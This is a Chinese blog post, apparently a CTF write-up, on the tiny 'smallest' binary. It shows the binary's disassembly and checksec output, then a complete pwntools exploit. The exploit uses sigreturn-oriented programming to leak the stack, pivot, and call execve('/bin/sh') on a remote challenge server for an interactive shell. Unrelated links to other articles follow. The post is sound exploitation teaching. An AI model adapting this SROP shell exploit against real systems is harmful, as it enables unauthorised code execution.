以前一直只是大概看过这种技术,没实践过,今天刚好遇到一道题,实践了一波,确实很方便

unmoxiao@cat ~/s/pd_ubuntu> r2 -A smallest                                                                             00:54:15

Warning: Cannot initialize dynamic strings

[x] Analyze all flags starting with sym. and entry0 (aa)

[x] Analyze len bytes of instructions for references (aar)

[x] Analyze function calls (aac)

[ ] [*] Use -AA or aaaa to perform additional experimental analysis.

[x] Constructing a function name for fcn.* and sym.func.* functions (aan))

0x004000b0

 -- WASTED

[0x004000b0]> afl

0x004000b0    1 17           entry0

[0x004000b0]> pdf entry0

            ;-- section..text:

/ (fcn) entry0 17

|   entry0 ();

|           0x004000b0      4831c0         xor rax, rax                ; section 1 va=0x004000b0 pa=0x000000b0 sz=17 vsz=17 rwx=--r-x .text

|           0x004000b3      ba00040000     mov edx, 0x400              ; 1024

|           0x004000b8      4889e6         mov rsi, rsp

|           0x004000bb      4889c7         mov rdi, rax

|           0x004000be      0f05           syscall

\           0x004000c0      c3             ret

[0x004000b0]>

源码就这么几行,

junmoxiao@cat ~/s/pd_ubuntu> file smallest                                                                              00:54:06

smallest: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped

junmoxiao@cat ~/s/pd_ubuntu> checksec smallest                                                                          00:54:12

[*] '/Users/junmoxiao/share/pd_ubuntu/smallest'

    Arch:     amd64-64-little

    RELRO:    No RELRO

    Stack:    No canary found

    NX:       NX enabled

    PIE:      No PIE (0x400000)

junmoxiao@cat ~/s/pd_ubuntu>

最后的exp

#coding:utf-8

from pwn import *

import time

file_name = './smallest'

context.binary = file_name

elf = ELF(file_name)

#context.log_level = 'debug'

syscall_addr = 0x4000be

#p = process(file_name)

p = remote('106.75.93.227', 20000)

#p = remote('106.75.61.55',  20000)

#gdb.attach(p, 'aslr on;b * 0x4000b0')

# ---------------------------------------------------------------------------------

log.info('call read; call write; call read')

payload = p64(0x4000b0)

payload += p64(0x4000b3)

payload += p64(0x4000b0)

p.sendline(payload)

time.sleep(3)

p.send('\xb3')

# -------------------------------------------------------------------------------------

# set eax; sigreturn;

leak_data = p.recvn(0x400)

leak_addr = u64(leak_data[0x8:0x8+8])

print "leak_addr: %s" % hex(leak_addr)

stack_addr = leak_addr - 0x1000

print 'stack_start_addr %s' % hex(stack_addr)

binsh_addr = stack_addr + 0x300

print 'binsh_addr: %s' % hex(binsh_addr)

log.info('stack pivot to %s' % hex(stack_addr))

frame = SigreturnFrame()

frame.rax = constants.SYS_read

frame.rdi = 0

frame.rsi = stack_addr

frame.rdx = 0x500

frame.rsp = stack_addr

frame.rip = syscall_addr

payload =  p64(0x4000b0) + p64(syscall_addr)

payload += str(frame)

p.sendline(payload)

time.sleep(10)

p.send(payload[8:8+15]) # set eax=sigreturn

time.sleep(5)

log.info('execve')

frame = SigreturnFrame()

frame.rax = constants.SYS_execve

frame.rdi = binsh_addr

frame.rsi = 0

frame.rdx = 0

frame.rsp = 0x400300

frame.rip = syscall_addr

payload =  p64(0x4000b0) + p64(syscall_addr)

payload += str(frame)

payload += 'a' * (0x300-len(payload)) + '/bin/sh\x00'

p.sendline(payload)

time.sleep(5)

p.send(payload[8:8+15]) # set eax=sigreturn

p.interactive()

SROP的一个实例的更多相关文章

  1. C#[Win32&WinCE&WM]应用程序只能运行一个实例:MutexHelper

    前言 在开发应用程序时,通常只让程序运行一个实例.所以,就要判断程序是否已经运行. 下面是我自己在项目中使用到,封装好的帮助类.有 普通的 C# 应用程序 和 Windows CE 和 Windows ...

  2. 转 C# 只允许运行一个实例

    来源:http://blog.csdn.net/jin20000/article/details/3136791 互斥进程(程序), 简单点说,就是在系统中只能有该程序的一个实例运行. 现在很多软件都 ...

  3. C# 只启动一个实例完全解决方案

    工作上经常会遇到"程序只能启动一个实例"这样的需求. 我想,这样的需求应该很普遍,所以没打算去动脑筋,去找谷歌问下就得了,用下来发现,不是这里不爽就是那里不行. 先说下我详细的几点 ...

  4. ArcGIS API for JavaScript开发环境搭建及第一个实例demo

    原文:ArcGIS API for JavaScript开发环境搭建及第一个实例demo ESRI公司截止到目前已经发布了最新的ArcGIS Server for JavaScript API v3. ...

  5. Sqlserver Sql Agent Job 只能同时有一个实例运行

    Sqlserver Sql Agent中的Job默认情况下只能有一个实例在运行,也就是说假如你的Sql Agent里面有一个正在运行的Job叫"Test Job",如果你现在再去启 ...

  6. c# 只允许一个实例运行

    1.单件模式,Singleton,应用程序只能允许一个实例在运行.这是最好的解决方法2.查询系统进程里是不是已经运行.private void Form1_Load(object sender, Ev ...

  7. Python使用MySQL数据库的方法以及一个实例

    使用环境:Windows+python3.4+MySQL5.5+Navicat 一.创建连接 1.准备工作,想要使用Python操作MySQL,首先需要安装MySQL-Python的包,在Python ...

  8. Linux编程之《只运行一个实例》

    概述 有些时候,我们要求一个程序在系统中只能启动一个实例.比如,Windows自带的播放软件Windows Medea Player在Windows里就只能启动一个实例.原因很简单,如果同时启动几个实 ...

  9. Qt之运行一个实例进程

    简述 发布程序的时候,我们往往会遇到这种情况: 只需要用户运行一个实例进程 用户可以同时运行多个实例进程 一个实例进程的软件有很多,例如:360.酷狗- 多个实例进程的软件也很多,例如:Visual ...

随机推荐

  1. MongoDB 学习笔记之 删除数据,集合,数据库

    删除数据,集合,数据库: 删除一个文档: db.media.deleteOne({"name": "Sky"}) 删除多个文档: db.media.delete ...

  2. 【maven的使用】1maven的概念与配置

    maven是一个基于java平台的自动化构建工具.构建工具的发展由make->ant->maven->gradle其中gradle还在发展中,使用较少,学习难度比较大,所以目前占据主 ...

  3. 排坑日记之批量从库IO进程停止

    早上刚睁眼,看到了一堆数据库告警的短信,其中一个内容如下: Problem started at 05:02:58 on 2019.10.12 Problem name: Slave is stopp ...

  4. [Swoole] 在Ubuntu下安装、快速开始

    本文主要讲述在 Ubuntu 下编译安装 Swoole,并根据官方文档给出的demo进行了测试和搬运,包括:TCP服务器.UDP服务器.HTTP服务器.WebSocket服务器.异步客户端.定时器和协 ...

  5. (八十五)c#Winform自定义控件-引用区块

    前提 入行已经7,8年了,一直想做一套漂亮点的自定义控件,于是就有了本系列文章. GitHub:https://github.com/kwwwvagaa/NetWinformControl 码云:ht ...

  6. 未来实现API管理系统的几个关键词

    下面将通过几个关键词的形式说明API管理的重要性和未来的实现方式. 1.生命周期管理 在整个API生命周期中更深入地集成所有工具将进一步提高生命周期循环的速度,而且更重要的是提供满足消费者需求的API ...

  7. Nebula 架构剖析系列(一)图数据库的存储设计

    摘要 在讨论某个数据库时,存储 ( Storage ) 和计算 ( Query Engine ) 通常是讨论的热点,也是爱好者们了解某个数据库不可或缺的部分.每个数据库都有其独有的存储.计算方式,今天 ...

  8. LeetCode_844-Backspace String Compare

    输入两个字符串S和T,字符串只包含小写字母和”#“,#表示为退格键,判断操作完退格键剩下字符串是否相等例子:S = “ab#c", T = "ad # c” 返回true,剩下的字 ...

  9. NDN helper 学习记录

    1.StackHelper 主要用于在请求的节点上安装ndnSIM网络堆栈, 提供一种简单的方法来配置NDN模拟的几个重要参数.(官方解释) 其实就是给结点装上堆栈 方法: 全部结点一次性安装(比较常 ...

  10. php服务器有哪些

    服务器按照功能可以分为:文件服务器.数据库服务器.web服务器.邮件服务器.代理服务器..... 而上述所有的服务器,均可以用php做开发,比如说做web服务器,常用的构架是php+Mysql+Apa ...